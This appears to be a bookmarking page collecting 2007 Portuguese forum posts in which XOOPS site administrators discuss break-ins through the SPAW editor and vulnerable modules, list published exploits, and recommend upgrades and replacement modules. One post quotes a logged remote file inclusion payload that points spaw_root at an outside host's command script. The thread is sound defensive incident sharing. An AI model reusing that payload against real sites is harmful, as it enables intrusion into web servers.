public marks

PUBLIC MARKS from bacon with tag alerta

18 July 2007

alerta! ataques a portais com xoops

fala galera.. tudo bem? estou sumidaço. :-(, mas aos poucos estarei retornando! :-) entrando no assunto, alguém sabe me dizer se existe alguma vulnerabilidade ligada ao pical 0.9? estava a dar uma olhada no log do servidor e percebi que desde final do mês passado uma série requisições. 66.249.65.230 - - [18/jul/2007:09:35:38 -0300] "get /srhonline/modules/pical/index.php?cid=&smode=daily&caldate=1982-10-3 http/1.1" 200 12510 66.249.65.230 - - [18/jul/2007:09:35:59 -0300] "get /srhonline/modules/pical/print.php?cid=&smode=daily&caldate=1958-8-15 http/1.1" 200 12510 66.249.65.230 - - [18/jul/2007:09:36:21 -0300] "get /srhonline/modules/pical/index.php?cid=&smode=weekly&caldate=1983-5-28 http/1.1" 200 12510 66.249.65.230 - - [18/jul/2007:09:36:42 -0300] "get /srhonline/modules/pical/print.php?cid=&smode=daily&caldate=1958-7-27 http/1.1" 200 12510 66.249.65.230 - - [18/jul/2007:09:37:03 -0

27 June 2007

alerta! ataques a portais com xoops

olá triwaca, como o pessoal já recomendo, o mastop_publish é a saída e também traz o editor wysiswyg tinymce que é o pai do editor [url=http://www.xoopscube.com.br/modules/news/article.php?storyid=571&keywords=tinyeditor]tinyeditor 1.0[/url], ambos podem ter seu skin alterado. o caso seria de achar um muito próximo do skin do spaw, isso se você ainda não usava o skin padrão. é isso

alerta! ataques a portais com xoops

triwaca, masrtop publish 1.1 a melhor solução!

alerta! ataques a portais com xoops

lembrando que é melhor fazer algumas trocas de módulos também. o xt_conteudo > mastop publish. o wf-section > smart section. eu sei que o smart section importa o que você já cadastrou no wf-section e também tem clonagem de módulo que é excelente caso use 2 módulos vulneráveis para artigos. o xt-conteudo foi descontinuado pelo que sei em favor do mastop publish e ele tem um editor excelente. mesmo depois das atualizações ainda reparei em arquivos entrando pelo cache : atributo 600 ou rw wrt9selyn wrtqec3os. wrtynykcu. e mesmo sem a pasta as entradas continuam no cache. <div class="xoopscode"><pre><samp><code>xt_conteudo^%2fmodules%2fxt_conteudo%2findex.php%3fid%3d1%2f%2fmodules%2fxt_conteudo%2fadmin%2fspaw%2fspaw_control.class.php%3fspaw_root%3dhttp%3a%2f%2fgarotym.kit.net%2fcmd%3f^zaja^%%2a^2aa^2aae5d37%%db%3axt_index.html</code></samp></pre> eu vou trocar o xt_conteudo pelo mast

26 June 2007

alerta! ataques a portais com xoops

poxa pessoal, tive 2 portais invadidos em 20 dias! por sorte não houveram maiores vandalismos, e consegui recuperar tudo rapidamente. os dois portais estavam usando o xoops 2.0.13 e ambos tinham o xt-conteúdo com o editor spaw. o problema é que meus utilizadores já estão muito acostumados com o spaw! não posso apagar agora! os dois ataques ocorreram de grupos diferentes, um era brasileiro e outro era da turquia. verifiquei as pastas com permissão de escrita (uploads, templates_c e cache) e achei os arquivos 'estranhos'. provavelmente as falhas de segurança usadas foram divulgadas em algum fórum e agora esses grupos de hackers estão usando contra portais xoops. isso também teria alguma relação com o problema do phpmailler? na dúvida, vou atualizar para o x2.0.16 e tentar mudar o spaw. para os outros colegas com portais em xoops, só digo uma coisa: backup neles!

20 June 2007

alerta! ataques a portais com xoops

obrigada gisa_iagami amigao. viu como a resposta já esta ajudando outros membros. sumido é pouco, mas vamos retornando a medida do possivel. pela resposta do suporte de hospedagem que nem o bckup é possivel usar, desanimei e vou partir para outra hospedagem e de preferencia com nossos amigos aqui do xoops mesmo. ja fiz contato e vou aguardar proposta. meu último bckup pessoal é de 6 meses para não dizer que perdi tudo.rs..snif..snif. vamos a luta e continuo contando com os xoopsamigos. sucesso. virtual

alerta! ataques a portais com xoops

#oops# cacetada! dessa lista meu portal tem 1 mod comprometido. e la vem a pergunta! o que fazer. remove o mod ,tem fix tem,tem outra versão! agora bateu o desespero :-d! to vendo se tem uma versão mais nova para esse mod fui!

alerta! ataques a portais com xoops

fala o sumidão, rss :-) xoops atendendo ao pedido do nobre colaborador. -::date -::description -::hits -::author 2007-06-13 xoops module xfsection (modify.php) remote file inclusion vulnerability 2236 r d sp[l]o1t 2007-06-13 xoops module xt-conteudo (spaw_root) rfi vulnerability 1763 r d g00ns. 2007-06-13 xoops module cjay content 3 remote file inclusion vulnerability 2571 r d g00ns. 2007-06-12 xoops module horoscope <= 2.0 remote file inclusion vulnerability 2273 r d beyazkurt. 2007-06-01 xoops module icontent 1.0 remote file inclusion exploit 3684 r d gold_m 2007-05-15 xoops module resmanager <= 1.21 blind sql injection exploit 1231 r d ajann. 2007-05-15 xoops module glossarie <= 1.7 (sid) remote sql injection exploit 1226 r d ajann. 2007-05-15 xoops module myconference 1.0 (index.php) sql injection exploit 1831 r d ajann. 2007-05-06 xoops module wfquotes 1.0 0 remote s

19 June 2007

alerta! ataques a portais com xoops

amigos! depois de muito tempo fora e até mesmo de visitar meu proprio portal, acreditando na segurança, não atualizei com novas versões e fui terrivelmente afetado a ponto do suporte de hospedagem remover a conta devido ao tamanho do estrago. vou reiniciar do zero seguindo as dicas aqui postadas. snif snif agora não adianta mais, é arregaçar as mangas e fazer funcionar de novo. obrigado pelas dicas e vamos em frente. pela experiencia dos amigos, favor relacionar os módulos suspeitos para que eu não os instale de novo e também qual versão disponivel já com as últimas seguranças inclusas? abraços; virtual. ganhei.net (invadido depois de varias outras tentativas anteriores segundo o suporte de hospedagem).

04 June 2007

alerta! ataques a portais com xoops

ótimas recomendações. dentre todas destaco com certeza o protector que tem sido essencial. mas para quem estiver rodando xoops 2.013.2. atualizem porque os problemas vem surgindo mesmo. e quem tiver algum módulo que usa o spaw como editor visual, tente buscar um alternativo ou trocar o editor visual, bem como apagar o spaw do servidor que tem sido uma brecha para invasões, ok?

alerta! ataques a portais com xoops

o cadastro do portal que fiz par uma escola está liberado, sem intervenção do administrador (ativação imediata), a pedido do cliente. recentemente havia um cadastro de nome estranho e que preencheu todos os comentários do news com span. apaguei simplesmente, mas me assusta saber que pode-se fazer tudo isto automaticamente. instalei o securityimage mas não sei implementá-lo. gostaria de fazê-lo funcionar no cadastro e no xfguestbook. valeu.

03 June 2007

alerta! ataques a portais com xoops

fique esperto! desde 25 de maio até hoje (pelo menos aconteceu comigo) começou inúmeras tentativas de ataques a portais que usam xoops. tive 2 portais afetados com diferentes versões, módulos e hospedagem um inclusive na locaweb que digamos é chato com segurança. onde gravaram na pasta uploads, cache, templates_c. bem as versões que estava rodando era o xoops 2.0.7.3 e outro 2.0.13.2 imediatamente fiz os updates para a versão 2.0.16, que sabemos que tem alguns bugs, mas até agora não enfrentei nenhum. recomendo: - façam o update para a última versão! analisando pelo analog do cpainel achei algumas tentativas de entradas em módulos que podem ser hackeados eles são o xoopsconteudo, tinycontent graças a uma pasta chamada spaw que é um editor visual que recetemente foi hackeado que pode ser usado com os módulos ela fica [nome módulo]/admin/spaw. recomendo: - excluam imediatam

bacon's TAGS related to tag alerta

andeon +   andersonp +   ataques +   bacura +   brasil +   cube +   forum +   hacker +   hospedagem +   hosting +   leniogoncalves +   luciano +   portais +   Ronaldo +   Segurança +   servidor +   sp +   templates +   triwaca +   virtual +   web +   xoops +